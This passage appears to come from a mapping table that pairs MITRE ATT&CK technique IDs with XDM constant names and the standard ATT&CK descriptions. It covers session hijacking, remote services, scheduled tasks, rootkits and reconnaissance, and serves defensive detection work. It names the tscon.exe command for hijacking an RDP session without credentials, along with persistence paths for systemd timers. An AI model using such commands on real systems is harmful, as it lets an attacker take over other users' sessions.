Remote desktop is a common feature in operating systems. It allows a user to log into an interactive
session with a system desktop graphical user interface on a remote system. Microsoft refers to its
implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation:
TechNet Remote Desktop Services) Adversaries may perform RDP session hijacking which involves
stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal
their session. With System permissions and using Terminal Services Console, `c:
\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the
need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely
or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to
[Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing
a Domain Admin or higher privileged account session. All of this can be done by using native Windows
commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf) https://
attack.mitre.org/techniques/T1563/002

T1563.001 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICE_SESSION_HIJACKING_SSH_HIJACKING Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure
Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to
connect to another system via an encrypted tunnel, commonly authenticating through a password,
certificate or the use of an asymmetric encryption key pair. In order to move laterally from a compromised
host, adversaries may take advantage of trust relationships established with other systems via public key
authentication in active SSH sessions by hijacking an existing connection to another system. This may
occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary
is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)
(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH
Hijack) [SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://
attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a
new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078). https://attack.mitre.org/
techniques/T1563/001

T1021 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service
specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may
then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be
organized into domains. Domains provide centralized identity management, allowing users to login using
one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain
credentials, they could login to many different machines using remote access protocols such as secure
shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote
Desktop Services) Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/
techniques/T1072) and other administrative programs) may utilize [Remote Services](https://
attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on
macOS is native software used for remote management. ARD leverages a blend of protocols, including
[VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH]
(https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM
macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin
Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform
lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an
ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts
without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation:
Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands) https://attack.mitre.org/
techniques/T1021

T1021.003 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_DISTRIBUTED_COMPONENT_OBJECT_MODEL Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote
machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then
perform actions as the logged-on user. The Windows Component Object Model (COM) is a component of
the native Windows application programming interface (API) that enables interaction between software
objects, or executable code that implements one or more interfaces. Through COM, a client object can call
methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).
Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local
computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)
(Citation: Microsoft COM) Permissions to interact with local and remote server COM objects are specified
by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only
Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM
ACL) Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely
obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook
DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.
(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM
can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also
invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly
through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE
Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a
method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/
techniques/T1047). (Citation: MSDN WMI) https://attack.mitre.org/techniques/T1021/003
Original Mapped Description

T1021.001 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_REMOTE_DESKTOP_PROTOCOL Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer
using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive
session with a system desktop graphical user interface on a remote system. Microsoft refers to its
implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation:
TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to
expand access if the service is enabled and allows access to accounts with known credentials. Adversaries
will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also
use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008)
technique for Persistence.(Citation: Alperovitch Malware) https://attack.mitre.org/techniques/T1021/001

T1021.002 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_SMB_OR_ADMIN_SHARES Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote
network share using Server Message Block (SMB). The adversary may then perform actions as the logged-
on user. SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network
or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally
throughout a network. Linux and macOS implementations of SMB typically use Samba. Windows systems
have hidden network shares that are accessible only to administrators and provide the ability for remote file
copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`.
Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://
attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia
Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet
RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques
that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/
techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows
Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM
hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/
T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares) https://
attack.mitre.org/techniques/T1021/002

T1021.004 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_SSH Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote
machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. SSH
is a protocol that allows authorized users to open remote shells on other computers. Many Linux and
macOS versions come with SSH installed by default, although typically disabled until the user enables it.
The SSH server can be configured to use standard password authentication or public-private keypairs in
lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a
special file on the computer running the server that lists which keypairs are allowed to login as that user.
https://attack.mitre.org/techniques/T1021/004

T1021.005 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_VNC Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control

machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system
that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s
display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote
Framebuffer Protocol) VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/
T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC
uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation:
MacOS VNC software for Remote Desktop)(Citation: VNC Authentication) Adversaries may abuse VNC to
perform malicious actions as the logged-on user such as opening documents, downloading files, and
running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to
collect data and information to pivot to other systems within the network. Specific VNC libraries/
implementations have also been susceptible to brute force attacks and memory usage exploitation.
(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC
Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers
PentestLab)(Citation: Havana authentication bug) https://attack.mitre.org/techniques/T1021/005

T1021.006 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICES_WINDOWS_REMOTE_MANAGEMENT Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote
systems using Windows Remote Management (WinRM). The adversary may then perform actions as the
logged-on user. WinRM is the name of both a Windows service and a protocol that allows a user to interact
with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft
WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.
(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows
Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI) https://
attack.mitre.org/techniques/T1021/006

T1018 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SYSTEM_DISCOVERY Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical
identifier on a network that may be used for Lateral Movement from the current system. Functionality could
exist within remote access tools to enable this, but utilities available on the operating system could also be
used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://
attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:
\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP
address mappings of remote systems. https://attack.mitre.org/techniques/T1018

T1091 XDM_CONST.MITRE_TECHNIQUE_REPLICATION_THROUGH_REMOVABLE_MEDIA Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying
malware to removable media and taking advantage of Autorun features when the media is inserted into a
system and executes. In the case of Lateral Movement, this may occur through modification of executable
files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick
users into executing it on a separate system. In the case of Initial Access, this may occur through manual
manipulation of the media, modification of systems used to initially format the media, or modification to the
media's firmware itself. https://attack.mitre.org/techniques/T1091

T1496 XDM_CONST.MITRE_TECHNIQUE_RESOURCE_HIJACKING Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems
which may impact system and/or hosted service availability. One common purpose for Resource Hijacking
is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume
enough system resources to negatively impact and/or cause affected machines to become unresponsive.
(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit -
Unused AWS Regions) systems are common targets because of the high potential for available resources,
but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency
mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs
and the potential for scaling mining activities by deploying or compromising multiple containers within an
environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s
not competing for resources.(Citation: Trend Micro War of Crypto Miners) https://attack.mitre.org/
techniques/T1496

T1207 XDM_CONST.MITRE_TECHNIQUE_ROGUE_DOMAIN_CONTROLLER Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data.
DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of
manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an
inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a
rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object,
including credentials and keys. Registering a rogue DC involves creating a new server and nTDSDSA
objects in the Configuration partition of the AD schema, which requires Administrator privileges (either
Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide) This technique may
bypass system logging and security monitors such as security information and event management (SIEM)
products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow
Blog) The technique may also be used to alter and delete replication and other associated metadata to
obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection]
(https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access
control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) https://
attack.mitre.org/techniques/T1207
Original Mapped Description

T1014 XDM_CONST.MITRE_TECHNIQUE_ROOTKIT Adversaries may use rootkits to hide the presence of programs, files, network connections, services,
drivers, and other system components. Rootkits are programs that hide the existence of malware by
intercepting/hooking and modifying operating system API calls that supply system information. (Citation:
Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level
in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://
attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for
Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac
OSX Rootkit) https://attack.mitre.org/techniques/T1014

T1053 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious
code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a
specified date and time. A task can also be scheduled on a remote system, provided the proper
authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on
a remote system typically requires being a member of an admin or otherwise privileged group on the
remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to
execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also
be abused to run a process under the context of a specified account (such as one with elevated
permissions/privileges). https://attack.mitre.org/techniques/T1053

T1053.001 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_LINUX_AT_JOB Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for
initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110)
command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix -
Task Scheduling in Linux) An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux
environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://
attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral
Movement and or to run a process under the context of a specified account. Adversaries may also abuse
[at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to
spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/
software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the
binary is allowed to run as superuser via sudo.(Citation: GTFObins at) https://attack.mitre.org/techniques/
T1053/001

T1053.002 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_WINDOWS_AT_JOB Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of
malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within
Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/
S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of
the local Administrators group. An adversary may use at.exe in Windows environments to execute
programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/
S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a
process under the context of a specified account (such as SYSTEM). Note: The at.exe command line
utility has been deprecated in current versions of Windows in favor of schtasks. https://attack.mitre.org/
techniques/T1053/002

T1053.007 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_OR_CONTAINER_ORCHESTRATION_JOB Adversaries may abuse task scheduling functionality provided by container orchestration tools such as
Kubernetes to schedule deployment of containers configured to execute malicious code. Container
orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux
system. Deployments of this type can also be configured to maintain a quantity of containers over time,
automating the process of maintaining persistence within a cluster. In Kubernetes, a CronJob may be used
to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)
(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a
Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)
https://attack.mitre.org/techniques/T1053/007

T1053.003 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_OR_CRON_JOB Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of
malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job
scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run
and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a
scheduled basis for persistence. https://attack.mitre.org/techniques/T1053/003

T1053.006 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_OR_SYSTEMD_TIMERS Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of
malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be
set to run on a calendar event or after a time span relative to a starting point. They can be used as an
alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation:
archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation:
Systemd Remote Control) Each .timer file must have a corresponding .service file with the same name,
e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/
techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation:
Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /
usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. An adversary may
use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.
(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch
package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)
Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may
also install user level timers to achieve user level persistence. https://attack.mitre.org/techniques/
T1053/006

T1029 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TRANSFER Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain
intervals. This could be done to blend traffic patterns with normal activity or availability. When scheduled
exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the
network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration
Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). https://attack.mitre.org/techniques/
T1029

T1113 XDM_CONST.MITRE_TECHNIQUE_SCREEN_CAPTURE Adversaries may attempt to take screen captures of the desktop to gather information over the course of an
operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-
compromise operations. Taking a screenshot is also typically possible through native utilities or API calls,
such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated
Mac Malware) https://attack.mitre.org/techniques/T1113

T1597 XDM_CONST.MITRE_TECHNIQUE_SEARCH_CLOSED_SOURCES Adversaries may search and gather information about victims from closed sources that can be used during
targeting. Information about victims may be available for purchase from reputable private sources and
databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity
CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or
cybercrime blackmarkets.(Citation: ZDNET Selling Data) Adversaries may search in different closed
databases depending on what information they seek to gather. Information from these sources may reveal
opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/
techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)),
establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or
[Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote
Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/
T1078)). https://attack.mitre.org/techniques/T1597
Original Mapped Description

T1597.002 XDM_CONST.MITRE_TECHNIQUE_SEARCH_CLOSED_SOURCES_PURCHASE_TECHNICAL_DATA Adversaries may purchase technical information about victims that can be used during targeting.
Information about victims may be available for purchase within reputable private sources and databases,
such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may
also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to
discover opportunities for successful breaches. Threat actors may gather various technical details from
purchased data, including but not limited to employee contact information, credentials, or specifics
regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may
reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://
attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/
T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/
T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex:
[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://
attack.mitre.org/techniques/T1078)). https://attack.mitre.org/techniques/T1597/002

T1597.001 XDM_CONST.MITRE_TECHNIQUE_SEARCH_CLOSED_SOURCES_THREAT_INTEL_VENDORS Adversaries may search private data from threat intelligence vendors for information that can be used
during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what
is publicly reported. Although sensitive details (such as customer names and other identifiers) may be
redacted, this information may contain trends regarding breaches such as target industries, attribution
claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds) Adversaries may search
in private threat intelligence vendor data to gather actionable information. Threat actors may seek
information/indicators gathered about their own campaigns, as well as those conducted by other
adversaries that may align with their target industries, capabilities/objectives, or other operational concerns.
Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search
Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources
(ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://
attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://
attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/
T1133)). https://attack.mitre.org/techniques/T1597/001

T1596 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES Adversaries may search freely available technical databases for information about victims that can be used
during targeting. Information about victims may be available in online databases and repositories, such as
registrations of domains/certificates as well as public collections of network data/artifacts gathered from
traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation:
Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open databases depending on what information they seek to gather.
Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing
for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://
attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://
attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/
T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or
[Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1596

T1596.004 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_CDNS Adversaries may search content delivery network (CDN) data about victims that can be used during
targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers.
CDNs may also allow organizations to customize content delivery based on the requestor’s geographical
region. Adversaries may search CDN data to gather actionable information. Threat actors can use online
resources and lookup tools to harvest information about content servers within a CDN. Adversaries may
also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/
or do not have the same protection mechanisms (ex: login portals) as the content hosted on the
organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal
opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/
T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing
operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or
[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by
Compromise](https://attack.mitre.org/techniques/T1189)). https://attack.mitre.org/techniques/T1596/004

T1596.001 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_DNS_OR_PASSIVE_DNS Adversaries may search DNS data for information about victims that can be used during targeting. DNS
information may include a variety of details, including registered name servers as well as records that
outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may search DNS
data to gather actionable information. Threat actors can query nameservers for a target organization
directly, or search through centralized repositories of logged DNS query responses (known as passive
DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS
misconfigurations/leaks that reveal information about internal networks. Information from these sources
may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://
attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/
T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/
T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex:
[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://
attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1596/001

T1596.003 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_DIGITAL_CERTIFICATES Adversaries may search public digital certificate data for information about victims that can be used during
targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the
origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS
communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use
online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup)
Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used
from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these
sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://
attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or
[Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote
Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/
